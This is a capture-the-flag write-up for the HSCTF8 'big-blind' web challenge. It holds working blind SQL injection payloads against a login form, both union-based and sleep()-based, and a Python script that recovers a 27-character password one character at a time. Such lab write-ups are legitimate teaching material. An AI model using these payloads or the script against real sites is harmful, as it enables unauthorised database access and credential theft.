
# HSCTF8 - big-blind

- Write-Up Author: Wendy \[[MOCTF](https://www.facebook.com/MOCSCTF)\]

- Flag: **flag{any_info_is_good_info}**
## **Question:**
big-blind

![img](./img/1.png)

## Write up:

The website is just a login page. Entering a single quote (`'`) in the form returns a 500 Internal Server Error, so the input is breaking a SQL query unescaped: it's a SQL injection challenge.

![img](./img/2.png)

First, I used the MySQL comment symbol (`#`) to cut off the rest of the original query, then a few probes to discover the table and column names and the password length. Because the page answers with a 500 whenever the query is invalid, a `union select` that references a table or column that does not exist fails while one that references a real one succeeds, which confirmed the `users` table with its `user` and `pass` columns. The last, time-based payload makes the server pause for 10 seconds only when the condition is true, and it confirmed that the password is 27 characters long.
```
admin' union select 1,2 from users #

admin' union select 1,2 from users where user='' #

admin' union select 1,2 from users where pass='' #

admin' and IF(1=(SELECT 1 FROM users WHERE Length(pass) = 27),sleep(10),0) #

```

The password is too long to guess by hand, so I wrote a script to recover it one character at a time with `LIKE 'prefix%'` probes: a guess is correct when the response is delayed by the `sleep()`. The recovered password turned out to be the flag.

```
#!/usr/bin/env python3
import requests

URL = "https://big-blind.hsc.tf/"
DELAY = 5        # seconds the server sleeps when the injected condition is true
PASS_LEN = 27    # found with the Length(pass) = 27 payload above

def blind(query):
    """Send one time-based probe; True if the server slept, i.e. the guess was right."""
    response = requests.post(URL, data={"user": query + ",sleep(%d),0) #" % DELAY, "pass": ""})
    if response.elapsed.total_seconds() > DELAY - 2:
        print(query)
        return True
    return False

# '%' and '_' are LIKE wildcards, so they are left out of the keyspace on purpose.
# Note that LIKE is usually case-insensitive in MySQL, so an upper-case and a
# lower-case guess of the same letter cannot be told apart this way.
keyspace = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$^&*()-=+'

query_left_side = "admin' and IF(1=(SELECT 1 FROM users WHERE pass LIKE '"
flag = ""
for x in range(1, PASS_LEN + 1):
    print(x)
    for k in keyspace:
        # full payload: admin' and IF(1=(SELECT 1 FROM users WHERE pass LIKE 'flag%'),sleep(5),0) #
        query = query_left_side + flag + k + "%')"
        if blind(query):
            flag += k
            break
    else:
        # nothing in the keyspace matched: assume the character is '_', which
        # cannot be probed directly because LIKE treats it as a wildcard
        flag += '_'
    print(flag)

print(flag)
```

![img](./img/3.png)

>flag{any_info_is_good_info}

Original writeup (https://github.com/MOCSCTF/CTF-Write-UP/blob/master/Web/HSCTF8%20-%20big-blind/README.md).